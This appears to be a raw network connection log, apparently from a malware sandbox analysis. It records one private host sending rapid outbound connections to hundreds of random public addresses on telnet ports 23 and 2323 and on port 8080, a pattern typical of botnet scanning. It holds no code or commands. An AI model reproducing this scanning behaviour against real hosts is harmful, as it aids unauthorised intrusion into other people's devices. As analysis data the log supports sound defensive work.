Feb 25, 2024 19:02:16.873131990 CET	6758	8080	192.168.2.15	94.154.126.242
Feb 25, 2024 19:02:16.873138905 CET	58983	23	192.168.2.15	185.249.132.19
Feb 25, 2024 19:02:16.873138905 CET	58983	23	192.168.2.15	175.107.60.31
Feb 25, 2024 19:02:16.873138905 CET	6758	8080	192.168.2.15	31.54.201.10
Feb 25, 2024 19:02:16.873140097 CET	58983	23	192.168.2.15	145.21.178.173
Feb 25, 2024 19:02:16.873140097 CET	58983	2323	192.168.2.15	172.157.169.170
Feb 25, 2024 19:02:16.873140097 CET	6758	8080	192.168.2.15	31.162.83.82
Feb 25, 2024 19:02:16.873140097 CET	58983	23	192.168.2.15	13.109.67.38
Feb 25, 2024 19:02:16.873140097 CET	6758	8080	192.168.2.15	94.210.134.93
Feb 25, 2024 19:02:16.873148918 CET	6758	8080	192.168.2.15	95.242.157.172
Feb 25, 2024 19:02:16.873148918 CET	6758	8080	192.168.2.15	94.169.14.3
Feb 25, 2024 19:02:16.873148918 CET	6758	8080	192.168.2.15	62.8.38.254
Feb 25, 2024 19:02:16.873148918 CET	58983	23	192.168.2.15	186.12.215.164
Feb 25, 2024 19:02:16.873150110 CET	6758	8080	192.168.2.15	62.25.40.157
Feb 25, 2024 19:02:16.873152018 CET	6758	8080	192.168.2.15	94.186.75.56
Feb 25, 2024 19:02:16.873152018 CET	6758	8080	192.168.2.15	94.91.169.41
Feb 25, 2024 19:02:16.873152018 CET	58983	23	192.168.2.15	161.225.220.117
Feb 25, 2024 19:02:16.873152018 CET	6758	8080	192.168.2.15	95.194.6.208
Feb 25, 2024 19:02:16.873152018 CET	6758	8080	192.168.2.15	62.91.90.9
Feb 25, 2024 19:02:16.873152018 CET	6758	8080	192.168.2.15	62.178.204.252
Feb 25, 2024 19:02:16.873152018 CET	58983	23	192.168.2.15	219.193.90.133
Feb 25, 2024 19:02:16.873161077 CET	6758	8080	192.168.2.15	94.166.41.108
Feb 25, 2024 19:02:16.873161077 CET	6758	8080	192.168.2.15	85.86.1.108
Feb 25, 2024 19:02:16.873162031 CET	6758	8080	192.168.2.15	95.146.129.52
Feb 25, 2024 19:02:16.873161077 CET	58983	2323	192.168.2.15	163.167.150.105
Feb 25, 2024 19:02:16.873162031 CET	58983	23	192.168.2.15	159.38.198.123
Feb 25, 2024 19:02:16.873162031 CET	6758	8080	192.168.2.15	94.110.253.149
Feb 25, 2024 19:02:16.873162031 CET	6758	8080	192.168.2.15	62.251.202.254
Feb 25, 2024 19:02:16.873167038 CET	58983	23	192.168.2.15	85.247.95.238
Feb 25, 2024 19:02:16.873167038 CET	6758	8080	192.168.2.15	85.119.82.216
Feb 25, 2024 19:02:16.873167992 CET	6758	8080	192.168.2.15	31.39.207.133
Feb 25, 2024 19:02:16.873167992 CET	58983	23	192.168.2.15	35.121.221.9
Feb 25, 2024 19:02:16.873167992 CET	58983	23	192.168.2.15	174.171.11.238
Feb 25, 2024 19:02:16.873167992 CET	6758	8080	192.168.2.15	85.134.75.191
Feb 25, 2024 19:02:16.873167992 CET	6758	8080	192.168.2.15	85.20.98.208
Feb 25, 2024 19:02:16.873167992 CET	6758	8080	192.168.2.15	31.187.0.209
Feb 25, 2024 19:02:16.873188972 CET	6758	8080	192.168.2.15	85.67.108.55
Feb 25, 2024 19:02:16.873188972 CET	6758	8080	192.168.2.15	62.164.228.14
Feb 25, 2024 19:02:16.873188972 CET	6758	8080	192.168.2.15	95.49.226.194
Feb 25, 2024 19:02:16.873188972 CET	58983	23	192.168.2.15	73.20.81.193
Feb 25, 2024 19:02:16.873188972 CET	6758	8080	192.168.2.15	31.10.206.56
Feb 25, 2024 19:02:16.873188972 CET	58983	23	192.168.2.15	201.197.67.33
Feb 25, 2024 19:02:16.873188972 CET	6758	8080	192.168.2.15	95.70.153.233
Feb 25, 2024 19:02:16.873188972 CET	6758	8080	192.168.2.15	85.34.126.202
Feb 25, 2024 19:02:16.873192072 CET	6758	8080	192.168.2.15	31.59.57.77
Feb 25, 2024 19:02:16.873192072 CET	6758	8080	192.168.2.15	31.210.186.111
Feb 25, 2024 19:02:16.873193026 CET	6758	8080	192.168.2.15	62.68.241.53
Feb 25, 2024 19:02:16.873193026 CET	58983	23	192.168.2.15	118.130.224.123
Feb 25, 2024 19:02:16.873193026 CET	6758	8080	192.168.2.15	94.202.88.59
Feb 25, 2024 19:02:16.873193026 CET	58983	23	192.168.2.15	51.28.210.27
Feb 25, 2024 19:02:16.873193026 CET	58983	23	192.168.2.15	211.162.221.179
Feb 25, 2024 19:02:16.873193026 CET	6758	8080	192.168.2.15	31.158.19.60
Feb 25, 2024 19:02:16.873198986 CET	58983	23	192.168.2.15	202.184.253.254
Feb 25, 2024 19:02:16.873198986 CET	6758	8080	192.168.2.15	31.169.29.22
Feb 25, 2024 19:02:16.873198986 CET	58983	23	192.168.2.15	67.182.153.99
Feb 25, 2024 19:02:16.873198986 CET	6758	8080	192.168.2.15	31.18.184.133
Feb 25, 2024 19:02:16.873198986 CET	6758	8080	192.168.2.15	94.105.8.222
Feb 25, 2024 19:02:16.873198986 CET	58983	23	192.168.2.15	148.245.198.239
Feb 25, 2024 19:02:16.873198986 CET	6758	8080	192.168.2.15	95.191.16.157
Feb 25, 2024 19:02:16.873198986 CET	58983	23	192.168.2.15	151.90.106.223
Feb 25, 2024 19:02:16.873239040 CET	6758	8080	192.168.2.15	85.66.0.148
Feb 25, 2024 19:02:16.873239040 CET	58983	23	192.168.2.15	8.150.40.172
Feb 25, 2024 19:02:16.873239040 CET	6758	8080	192.168.2.15	85.149.47.110
Feb 25, 2024 19:02:16.873239040 CET	58983	23	192.168.2.15	180.107.95.185
Feb 25, 2024 19:02:16.873239040 CET	6758	8080	192.168.2.15	94.185.224.45
Feb 25, 2024 19:02:16.873239994 CET	6758	8080	192.168.2.15	31.183.184.150
Feb 25, 2024 19:02:16.873239994 CET	6758	8080	192.168.2.15	85.11.79.174
Feb 25, 2024 19:02:16.873239994 CET	6758	8080	192.168.2.15	95.1.129.60
Feb 25, 2024 19:02:16.873251915 CET	58983	23	192.168.2.15	109.7.153.90
Feb 25, 2024 19:02:16.873251915 CET	6758	8080	192.168.2.15	31.57.185.234
Feb 25, 2024 19:02:16.873251915 CET	6758	8080	192.168.2.15	94.150.176.131
Feb 25, 2024 19:02:16.873251915 CET	6758	8080	192.168.2.15	95.209.47.91
Feb 25, 2024 19:02:16.873253107 CET	6758	8080	192.168.2.15	95.14.47.227
Feb 25, 2024 19:02:16.873253107 CET	58983	23	192.168.2.15	94.166.231.173
Feb 25, 2024 19:02:16.873253107 CET	58983	23	192.168.2.15	170.28.122.248
Feb 25, 2024 19:02:16.873253107 CET	6758	8080	192.168.2.15	85.83.200.205
Feb 25, 2024 19:02:16.873265982 CET	6758	8080	192.168.2.15	85.211.154.208
Feb 25, 2024 19:02:16.873265982 CET	58983	23	192.168.2.15	218.90.89.213
Feb 25, 2024 19:02:16.873265982 CET	6758	8080	192.168.2.15	62.227.110.4
Feb 25, 2024 19:02:16.873265982 CET	6758	8080	192.168.2.15	62.237.154.40
Feb 25, 2024 19:02:16.873265982 CET	58983	23	192.168.2.15	79.138.126.22
Feb 25, 2024 19:02:16.873265982 CET	6758	8080	192.168.2.15	62.133.24.22
Feb 25, 2024 19:02:16.873266935 CET	6758	8080	192.168.2.15	94.26.51.167
Feb 25, 2024 19:02:16.873266935 CET	58983	23	192.168.2.15	210.138.118.27
Feb 25, 2024 19:02:16.873279095 CET	58983	2323	192.168.2.15	167.72.7.211
Feb 25, 2024 19:02:16.873280048 CET	58983	23	192.168.2.15	41.216.135.210
Feb 25, 2024 19:02:16.873280048 CET	6758	8080	192.168.2.15	62.216.92.216
Feb 25, 2024 19:02:16.873280048 CET	6758	8080	192.168.2.15	31.233.135.54
Feb 25, 2024 19:02:16.873280048 CET	6758	8080	192.168.2.15	94.76.182.228
Feb 25, 2024 19:02:16.873280048 CET	6758	8080	192.168.2.15	31.96.80.90
Feb 25, 2024 19:02:16.873280048 CET	6758	8080	192.168.2.15	95.229.198.153
Feb 25, 2024 19:02:16.873280048 CET	6758	8080	192.168.2.15	62.42.184.100
Feb 25, 2024 19:02:16.873287916 CET	58983	23	192.168.2.15	71.161.211.38
Feb 25, 2024 19:02:16.873287916 CET	6758	8080	192.168.2.15	31.112.6.231
Feb 25, 2024 19:02:16.873287916 CET	6758	8080	192.168.2.15	94.157.129.33
Feb 25, 2024 19:02:16.873287916 CET	6758	8080	192.168.2.15	95.117.46.185
Feb 25, 2024 19:02:16.873287916 CET	6758	8080	192.168.2.15	62.132.1.146
Feb 25, 2024 19:02:16.873287916 CET	6758	8080	192.168.2.15	85.39.13.58
Feb 25, 2024 19:02:16.873287916 CET	58983	2323	192.168.2.15	54.242.223.52
Feb 25, 2024 19:02:16.873287916 CET	6758	8080	192.168.2.15	62.126.16.113
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	31.46.210.127
Feb 25, 2024 19:02:16.873316050 CET	58983	23	192.168.2.15	134.133.109.14
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	85.176.16.135
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	31.175.147.132
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	31.83.53.30
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	94.122.104.169
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	62.39.3.161
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	94.220.200.93
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	85.145.132.124
Feb 25, 2024 19:02:16.873316050 CET	6758	8080	192.168.2.15	95.209.101.37
Feb 25, 2024 19:02:16.873316050 CET	58983	23	192.168.2.15	129.245.117.249
Feb 25, 2024 19:02:16.873316050 CET	58983	23	192.168.2.15	44.178.23.189
Feb 25, 2024 19:02:16.873316050 CET	58983	23	192.168.2.15	114.198.36.13
Feb 25, 2024 19:02:16.873316050 CET	58983	23	192.168.2.15	38.24.251.171
Feb 25, 2024 19:02:16.873316050 CET	58983	23	192.168.2.15	218.73.138.220
Feb 25, 2024 19:02:16.873316050 CET	58983	23	192.168.2.15	71.211.243.248
Feb 25, 2024 19:02:16.873326063 CET	58983	23	192.168.2.15	27.139.50.87
Feb 25, 2024 19:02:16.873326063 CET	58983	23	192.168.2.15	115.68.3.63
Feb 25, 2024 19:02:16.873326063 CET	58983	23	192.168.2.15	153.153.112.205
Feb 25, 2024 19:02:16.873326063 CET	6758	8080	192.168.2.15	94.152.239.18
Feb 25, 2024 19:02:16.873326063 CET	6758	8080	192.168.2.15	94.191.21.149
Feb 25, 2024 19:02:16.873352051 CET	6758	8080	192.168.2.15	85.212.102.57
Feb 25, 2024 19:02:16.873352051 CET	6758	8080	192.168.2.15	31.55.122.208
Feb 25, 2024 19:02:16.873352051 CET	6758	8080	192.168.2.15	85.208.133.237
Feb 25, 2024 19:02:16.873352051 CET	58983	23	192.168.2.15	199.193.91.226
Feb 25, 2024 19:02:16.873352051 CET	6758	8080	192.168.2.15	62.92.2.57
Feb 25, 2024 19:02:16.873352051 CET	58983	23	192.168.2.15	44.71.96.63
Feb 25, 2024 19:02:16.873352051 CET	6758	8080	192.168.2.15	85.229.240.142
Feb 25, 2024 19:02:16.873352051 CET	6758	8080	192.168.2.15	85.233.241.82
Feb 25, 2024 19:02:16.873384953 CET	6758	8080	192.168.2.15	95.153.79.17
Feb 25, 2024 19:02:16.873384953 CET	6758	8080	192.168.2.15	31.71.173.196
Feb 25, 2024 19:02:16.873384953 CET	6758	8080	192.168.2.15	31.229.219.118
Feb 25, 2024 19:02:16.873384953 CET	58983	23	192.168.2.15	82.84.5.246
Feb 25, 2024 19:02:16.873384953 CET	6758	8080	192.168.2.15	94.59.29.227
Feb 25, 2024 19:02:16.873384953 CET	6758	8080	192.168.2.15	62.80.251.121
Feb 25, 2024 19:02:16.873406887 CET	6758	8080	192.168.2.15	62.8.215.197
Feb 25, 2024 19:02:16.873406887 CET	58983	23	192.168.2.15	189.52.164.145
Feb 25, 2024 19:02:16.873406887 CET	58983	23	192.168.2.15	46.248.234.82
Feb 25, 2024 19:02:16.873406887 CET	6758	8080	192.168.2.15	31.6.153.167
Feb 25, 2024 19:02:16.873406887 CET	6758	8080	192.168.2.15	95.149.226.128
Feb 25, 2024 19:02:16.873406887 CET	6758	8080	192.168.2.15	62.109.146.213
Feb 25, 2024 19:02:16.873409986 CET	58983	23	192.168.2.15	40.26.226.101
Feb 25, 2024 19:02:16.873410940 CET	6758	8080	192.168.2.15	94.103.180.205
Feb 25, 2024 19:02:16.873410940 CET	6758	8080	192.168.2.15	31.177.187.137
Feb 25, 2024 19:02:16.873410940 CET	6758	8080	192.168.2.15	62.19.231.66
Feb 25, 2024 19:02:16.873410940 CET	6758	8080	192.168.2.15	85.116.104.46
Feb 25, 2024 19:02:16.873410940 CET	6758	8080	192.168.2.15	62.115.110.79
Feb 25, 2024 19:02:16.873410940 CET	6758	8080	192.168.2.15	62.202.44.189
Feb 25, 2024 19:02:16.873410940 CET	6758	8080	192.168.2.15	95.79.155.212
Feb 25, 2024 19:02:16.873416901 CET	6758	8080	192.168.2.15	94.62.146.82
Feb 25, 2024 19:02:16.873416901 CET	58983	23	192.168.2.15	124.13.243.71
Feb 25, 2024 19:02:16.873416901 CET	6758	8080	192.168.2.15	62.244.70.89
Feb 25, 2024 19:02:16.873416901 CET	6758	8080	192.168.2.15	62.187.1.245
Feb 25, 2024 19:02:16.873416901 CET	6758	8080	192.168.2.15	95.210.229.129
Feb 25, 2024 19:02:16.873416901 CET	6758	8080	192.168.2.15	31.171.197.13
Feb 25, 2024 19:02:16.873416901 CET	6758	8080	192.168.2.15	62.238.161.178
Feb 25, 2024 19:02:16.873416901 CET	6758	8080	192.168.2.15	62.84.157.6
Feb 25, 2024 19:02:16.873425961 CET	58983	23	192.168.2.15	34.188.179.49
Feb 25, 2024 19:02:16.873425961 CET	6758	8080	192.168.2.15	62.246.30.128
Feb 25, 2024 19:02:16.873425961 CET	6758	8080	192.168.2.15	31.121.164.113
Feb 25, 2024 19:02:16.873426914 CET	6758	8080	192.168.2.15	94.158.98.87
Feb 25, 2024 19:02:16.873428106 CET	6758	8080	192.168.2.15	85.7.31.162
Feb 25, 2024 19:02:16.873426914 CET	6758	8080	192.168.2.15	62.137.178.49
Feb 25, 2024 19:02:16.873426914 CET	6758	8080	192.168.2.15	95.4.210.202
Feb 25, 2024 19:02:16.873426914 CET	6758	8080	192.168.2.15	31.144.1.28
Feb 25, 2024 19:02:16.873426914 CET	58983	23	192.168.2.15	120.78.61.246
Feb 25, 2024 19:02:16.873428106 CET	58983	23	192.168.2.15	23.107.98.114
Feb 25, 2024 19:02:16.873428106 CET	6758	8080	192.168.2.15	31.19.50.239
Feb 25, 2024 19:02:16.873450041 CET	58983	23	192.168.2.15	58.14.73.199
Feb 25, 2024 19:02:16.873450041 CET	6758	8080	192.168.2.15	95.48.53.87
Feb 25, 2024 19:02:16.873450041 CET	6758	8080	192.168.2.15	95.144.206.50
Feb 25, 2024 19:02:16.873450041 CET	6758	8080	192.168.2.15	94.30.138.126
Feb 25, 2024 19:02:16.873450041 CET	6758	8080	192.168.2.15	94.19.87.177
Feb 25, 2024 19:02:16.873450041 CET	6758	8080	192.168.2.15	62.193.73.91
Feb 25, 2024 19:02:16.873450041 CET	58983	2323	192.168.2.15	167.11.224.208
Feb 25, 2024 19:02:16.873450041 CET	6758	8080	192.168.2.15	85.167.151.156
Feb 25, 2024 19:02:16.873456955 CET	58983	23	192.168.2.15	73.248.13.2
Feb 25, 2024 19:02:16.873456955 CET	58983	23	192.168.2.15	118.49.100.1
Feb 25, 2024 19:02:16.873476982 CET	6758	8080	192.168.2.15	94.7.171.215
Feb 25, 2024 19:02:16.873476982 CET	6758	8080	192.168.2.15	62.80.133.207
Feb 25, 2024 19:02:16.873477936 CET	6758	8080	192.168.2.15	85.44.151.172
Feb 25, 2024 19:02:16.873486042 CET	6758	8080	192.168.2.15	95.54.180.51
Feb 25, 2024 19:02:16.873486042 CET	6758	8080	192.168.2.15	94.53.115.85
Feb 25, 2024 19:02:16.873486042 CET	6758	8080	192.168.2.15	62.124.133.211
Feb 25, 2024 19:02:16.873486042 CET	6758	8080	192.168.2.15	31.151.191.130
Feb 25, 2024 19:02:16.873486042 CET	6758	8080	192.168.2.15	31.131.158.145
Feb 25, 2024 19:02:16.873514891 CET	6758	8080	192.168.2.15	85.70.147.33
Feb 25, 2024 19:02:16.873514891 CET	6758	8080	192.168.2.15	85.28.186.41
Feb 25, 2024 19:02:16.873514891 CET	6758	8080	192.168.2.15	94.165.163.38
Feb 25, 2024 19:02:16.873514891 CET	58983	23	192.168.2.15	193.69.175.237
Feb 25, 2024 19:02:16.873514891 CET	58983	23	192.168.2.15	111.119.186.240
Feb 25, 2024 19:02:16.873517990 CET	6758	8080	192.168.2.15	95.209.84.190
Feb 25, 2024 19:02:16.873517990 CET	6758	8080	192.168.2.15	31.247.94.115
Feb 25, 2024 19:02:16.873517990 CET	6758	8080	192.168.2.15	85.114.49.216
Feb 25, 2024 19:02:16.873517990 CET	58983	23	192.168.2.15	220.89.204.93
Feb 25, 2024 19:02:16.873517990 CET	58983	23	192.168.2.15	135.244.114.11
Feb 25, 2024 19:02:16.873517990 CET	6758	8080	192.168.2.15	94.178.20.135
Feb 25, 2024 19:02:16.873517990 CET	6758	8080	192.168.2.15	94.207.0.138
Feb 25, 2024 19:02:16.873517990 CET	6758	8080	192.168.2.15	95.183.43.176
Feb 25, 2024 19:02:16.873522043 CET	58983	23	192.168.2.15	218.95.6.158
Feb 25, 2024 19:02:16.873522043 CET	6758	8080	192.168.2.15	85.187.128.52
Feb 25, 2024 19:02:16.873522043 CET	6758	8080	192.168.2.15	85.157.191.202
Feb 25, 2024 19:02:16.873522043 CET	6758	8080	192.168.2.15	62.122.87.84
Feb 25, 2024 19:02:16.873522043 CET	6758	8080	192.168.2.15	31.59.29.125
Feb 25, 2024 19:02:16.873522043 CET	58983	2323	192.168.2.15	222.173.107.156
Feb 25, 2024 19:02:16.873522043 CET	6758	8080	192.168.2.15	85.106.202.136
Feb 25, 2024 19:02:16.873522043 CET	58983	23	192.168.2.15	208.82.236.126
Feb 25, 2024 19:02:16.873526096 CET	6758	8080	192.168.2.15	62.101.60.130
Feb 25, 2024 19:02:16.873529911 CET	58983	23	192.168.2.15	203.12.208.181
Feb 25, 2024 19:02:16.873529911 CET	6758	8080	192.168.2.15	95.253.231.21
Feb 25, 2024 19:02:16.873529911 CET	6758	8080	192.168.2.15	85.32.34.44
Feb 25, 2024 19:02:16.873529911 CET	6758	8080	192.168.2.15	95.253.2.196
Feb 25, 2024 19:02:16.873531103 CET	58983	23	192.168.2.15	130.119.114.145
Feb 25, 2024 19:02:16.873531103 CET	58983	2323	192.168.2.15	9.144.93.119
Feb 25, 2024 19:02:16.873531103 CET	6758	8080	192.168.2.15	95.95.223.80
Feb 25, 2024 19:02:16.873531103 CET	58983	23	192.168.2.15	17.115.102.128
Feb 25, 2024 19:02:16.873541117 CET	6758	8080	192.168.2.15	95.103.159.188
Feb 25, 2024 19:02:16.873541117 CET	6758	8080	192.168.2.15	94.67.107.234
Feb 25, 2024 19:02:16.873552084 CET	6758	8080	192.168.2.15	31.216.33.71
Feb 25, 2024 19:02:16.873552084 CET	6758	8080	192.168.2.15	62.63.223.94
Feb 25, 2024 19:02:16.873560905 CET	6758	8080	192.168.2.15	94.177.232.216
Feb 25, 2024 19:02:16.873568058 CET	6758	8080	192.168.2.15	95.19.163.219
Feb 25, 2024 19:02:16.873568058 CET	6758	8080	192.168.2.15	95.130.179.17
Feb 25, 2024 19:02:16.873574972 CET	6758	8080	192.168.2.15	62.244.173.206
Feb 25, 2024 19:02:16.873588085 CET	58983	23	192.168.2.15	196.114.12.141
Feb 25, 2024 19:02:16.873594999 CET	6758	8080	192.168.2.15	85.147.180.28
Feb 25, 2024 19:02:16.873594999 CET	58983	2323	192.168.2.15	102.178.236.50
Feb 25, 2024 19:02:16.873600960 CET	6758	8080	192.168.2.15	85.80.168.79
Feb 25, 2024 19:02:16.873600960 CET	6758	8080	192.168.2.15	31.10.92.255
Feb 25, 2024 19:02:16.873600960 CET	6758	8080	192.168.2.15	85.156.68.84
Feb 25, 2024 19:02:16.873600960 CET	6758	8080	192.168.2.15	62.187.169.236
Feb 25, 2024 19:02:16.873600960 CET	58983	23	192.168.2.15	158.35.99.135
Feb 25, 2024 19:02:16.873601913 CET	6758	8080	192.168.2.15	62.25.176.176
Feb 25, 2024 19:02:16.873601913 CET	6758	8080	192.168.2.15	31.41.22.187
Feb 25, 2024 19:02:16.873601913 CET	6758	8080	192.168.2.15	94.100.150.139
Feb 25, 2024 19:02:16.873610020 CET	6758	8080	192.168.2.15	94.226.107.24
Feb 25, 2024 19:02:16.873610020 CET	6758	8080	192.168.2.15	85.163.28.157
Feb 25, 2024 19:02:16.873610973 CET	58983	23	192.168.2.15	64.124.174.152
Feb 25, 2024 19:02:16.873610020 CET	58983	23	192.168.2.15	5.106.10.190
Feb 25, 2024 19:02:16.873610973 CET	6758	8080	192.168.2.15	85.253.150.210
Feb 25, 2024 19:02:16.873610020 CET	6758	8080	192.168.2.15	31.177.165.74
Feb 25, 2024 19:02:16.873613119 CET	6758	8080	192.168.2.15	62.100.132.7
Feb 25, 2024 19:02:16.873610973 CET	6758	8080	192.168.2.15	95.188.229.171
Feb 25, 2024 19:02:16.873615980 CET	58983	23	192.168.2.15	202.81.169.17
Feb 25, 2024 19:02:16.873610020 CET	6758	8080	192.168.2.15	94.146.214.64
Feb 25, 2024 19:02:16.873610973 CET	6758	8080	192.168.2.15	62.225.213.25
Feb 25, 2024 19:02:16.873610020 CET	58983	23	192.168.2.15	32.200.172.191
Feb 25, 2024 19:02:16.873620033 CET	6758	8080	192.168.2.15	31.33.142.241
Feb 25, 2024 19:02:16.873610973 CET	6758	8080	192.168.2.15	31.70.65.180
Feb 25, 2024 19:02:16.873621941 CET	6758	8080	192.168.2.15	95.171.22.186
Feb 25, 2024 19:02:16.873610973 CET	58983	23	192.168.2.15	128.225.173.160
Feb 25, 2024 19:02:16.873621941 CET	6758	8080	192.168.2.15	85.196.98.119
Feb 25, 2024 19:02:16.873610020 CET	6758	8080	192.168.2.15	62.241.109.103
Feb 25, 2024 19:02:16.873610973 CET	6758	8080	192.168.2.15	62.193.234.9
Feb 25, 2024 19:02:16.873610020 CET	58983	23	192.168.2.15	32.83.211.52
Feb 25, 2024 19:02:16.873621941 CET	6758	8080	192.168.2.15	31.44.187.47
Feb 25, 2024 19:02:16.873610973 CET	6758	8080	192.168.2.15	94.69.24.62
Feb 25, 2024 19:02:16.873621941 CET	6758	8080	192.168.2.15	94.186.127.224
Feb 25, 2024 19:02:16.873621941 CET	6758	8080	192.168.2.15	95.193.126.186
Feb 25, 2024 19:02:16.873621941 CET	58983	23	192.168.2.15	173.164.183.82
Feb 25, 2024 19:02:16.873621941 CET	6758	8080	192.168.2.15	94.156.92.20
Feb 25, 2024 19:02:16.873621941 CET	6758	8080	192.168.2.15	85.29.195.231
Feb 25, 2024 19:02:16.873650074 CET	6758	8080	192.168.2.15	31.74.160.126
Feb 25, 2024 19:02:16.873650074 CET	58983	23	192.168.2.15	200.53.22.84
Feb 25, 2024 19:02:16.873650074 CET	58983	2323	192.168.2.15	71.12.57.156
Feb 25, 2024 19:02:16.873650074 CET	6758	8080	192.168.2.15	94.242.86.135
Feb 25, 2024 19:02:16.873650074 CET	58983	23	192.168.2.15	218.128.38.36
Feb 25, 2024 19:02:16.873650074 CET	58983	23	192.168.2.15	211.102.44.150
Feb 25, 2024 19:02:16.873650074 CET	58983	23	192.168.2.15	190.161.174.27
Feb 25, 2024 19:02:16.873650074 CET	6758	8080	192.168.2.15	85.141.210.15
Feb 25, 2024 19:02:16.873653889 CET	6758	8080	192.168.2.15	31.105.180.214
Feb 25, 2024 19:02:16.873657942 CET	6758	8080	192.168.2.15	85.169.181.70
Feb 25, 2024 19:02:16.873657942 CET	58983	23	192.168.2.15	124.51.0.130
Feb 25, 2024 19:02:16.873692036 CET	58983	23	192.168.2.15	209.9.30.142
Feb 25, 2024 19:02:16.873692989 CET	58983	23	192.168.2.15	165.33.67.207
Feb 25, 2024 19:02:16.873692989 CET	58983	23	192.168.2.15	188.55.241.120
Feb 25, 2024 19:02:16.873697996 CET	6758	8080	192.168.2.15	62.132.41.222
Feb 25, 2024 19:02:16.873697996 CET	6758	8080	192.168.2.15	95.209.119.97
Feb 25, 2024 19:02:16.873706102 CET	58983	23	192.168.2.15	118.12.63.140
Feb 25, 2024 19:02:16.873706102 CET	6758	8080	192.168.2.15	95.22.248.61
Feb 25, 2024 19:02:16.873706102 CET	58983	23	192.168.2.15	59.155.57.16
Feb 25, 2024 19:02:16.873706102 CET	6758	8080	192.168.2.15	94.17.137.67
Feb 25, 2024 19:02:16.873706102 CET	6758	8080	192.168.2.15	85.244.74.206
Feb 25, 2024 19:02:16.873706102 CET	6758	8080	192.168.2.15	94.30.7.147
Feb 25, 2024 19:02:16.873706102 CET	6758	8080	192.168.2.15	62.254.69.120
Feb 25, 2024 19:02:16.873706102 CET	58983	23	192.168.2.15	45.175.12.194
Feb 25, 2024 19:02:16.873718977 CET	58983	23	192.168.2.15	171.121.238.74
Feb 25, 2024 19:02:16.873718977 CET	58983	2323	192.168.2.15	139.77.68.66
Feb 25, 2024 19:02:16.873723984 CET	6758	8080	192.168.2.15	85.30.16.158
Feb 25, 2024 19:02:16.873724937 CET	58983	23	192.168.2.15	194.194.161.75
Feb 25, 2024 19:02:16.873729944 CET	6758	8080	192.168.2.15	85.135.146.201
Feb 25, 2024 19:02:16.873729944 CET	58983	23	192.168.2.15	8.238.27.6
Feb 25, 2024 19:02:16.873729944 CET	6758	8080	192.168.2.15	85.12.98.166
Feb 25, 2024 19:02:16.873729944 CET	6758	8080	192.168.2.15	85.251.154.165
Feb 25, 2024 19:02:16.873729944 CET	6758	8080	192.168.2.15	85.202.241.123
Feb 25, 2024 19:02:16.873732090 CET	6758	8080	192.168.2.15	62.65.141.234
Feb 25, 2024 19:02:16.873729944 CET	6758	8080	192.168.2.15	31.206.250.173
Feb 25, 2024 19:02:16.873732090 CET	6758	8080	192.168.2.15	62.68.186.10
Feb 25, 2024 19:02:16.873729944 CET	58983	23	192.168.2.15	67.146.41.162
Feb 25, 2024 19:02:16.873732090 CET	6758	8080	192.168.2.15	94.89.243.49
Feb 25, 2024 19:02:16.873732090 CET	58983	23	192.168.2.15	83.194.81.153
Feb 25, 2024 19:02:16.873732090 CET	6758	8080	192.168.2.15	85.51.28.132
Feb 25, 2024 19:02:16.873734951 CET	6758	8080	192.168.2.15	85.203.125.49
Feb 25, 2024 19:02:16.873734951 CET	58983	23	192.168.2.15	190.67.122.176
Feb 25, 2024 19:02:16.873734951 CET	6758	8080	192.168.2.15	31.70.185.218
Feb 25, 2024 19:02:16.873734951 CET	6758	8080	192.168.2.15	62.199.52.238
Feb 25, 2024 19:02:16.873734951 CET	6758	8080	192.168.2.15	62.243.107.107
Feb 25, 2024 19:02:16.873734951 CET	6758	8080	192.168.2.15	95.184.98.204
Feb 25, 2024 19:02:16.873734951 CET	58983	23	192.168.2.15	75.53.105.86
Feb 25, 2024 19:02:16.873738050 CET	6758	8080	192.168.2.15	62.185.233.142
Feb 25, 2024 19:02:16.873755932 CET	6758	8080	192.168.2.15	85.85.26.206
Feb 25, 2024 19:02:16.873755932 CET	6758	8080	192.168.2.15	95.42.178.224
Feb 25, 2024 19:02:16.873755932 CET	6758	8080	192.168.2.15	95.208.198.187
Feb 25, 2024 19:02:16.873755932 CET	6758	8080	192.168.2.15	95.116.124.166
Feb 25, 2024 19:02:16.873759031 CET	58983	23	192.168.2.15	97.162.18.21
Feb 25, 2024 19:02:16.873764038 CET	6758	8080	192.168.2.15	85.175.223.199
Feb 25, 2024 19:02:16.873774052 CET	58983	23	192.168.2.15	72.211.172.232
Feb 25, 2024 19:02:16.873781919 CET	58983	23	192.168.2.15	137.181.103.129
Feb 25, 2024 19:02:16.873781919 CET	6758	8080	192.168.2.15	95.234.32.36
Feb 25, 2024 19:02:16.873788118 CET	6758	8080	192.168.2.15	85.37.61.235
Feb 25, 2024 19:02:16.873790979 CET	6758	8080	192.168.2.15	95.100.131.29
Feb 25, 2024 19:02:16.873794079 CET	58983	2323	192.168.2.15	25.228.192.254
Feb 25, 2024 19:02:16.873796940 CET	58983	23	192.168.2.15	83.121.56.151
Feb 25, 2024 19:02:16.873796940 CET	58983	23	192.168.2.15	198.213.221.12
Feb 25, 2024 19:02:16.873796940 CET	6758	8080	192.168.2.15	95.101.19.130
Feb 25, 2024 19:02:16.873796940 CET	6758	8080	192.168.2.15	95.113.109.116
Feb 25, 2024 19:02:16.873796940 CET	6758	8080	192.168.2.15	62.127.143.255
Feb 25, 2024 19:02:16.873799086 CET	6758	8080	192.168.2.15	94.57.223.102
Feb 25, 2024 19:02:16.873801947 CET	6758	8080	192.168.2.15	31.103.247.107
Feb 25, 2024 19:02:16.873801947 CET	58983	23	192.168.2.15	130.111.247.235
Feb 25, 2024 19:02:16.873801947 CET	6758	8080	192.168.2.15	94.52.186.69
Feb 25, 2024 19:02:16.873801947 CET	6758	8080	192.168.2.15	94.16.251.201
Feb 25, 2024 19:02:16.873804092 CET	6758	8080	192.168.2.15	95.177.157.189
Feb 25, 2024 19:02:16.873805046 CET	6758	8080	192.168.2.15	31.173.235.28
Feb 25, 2024 19:02:16.873805046 CET	6758	8080	192.168.2.15	95.42.245.202
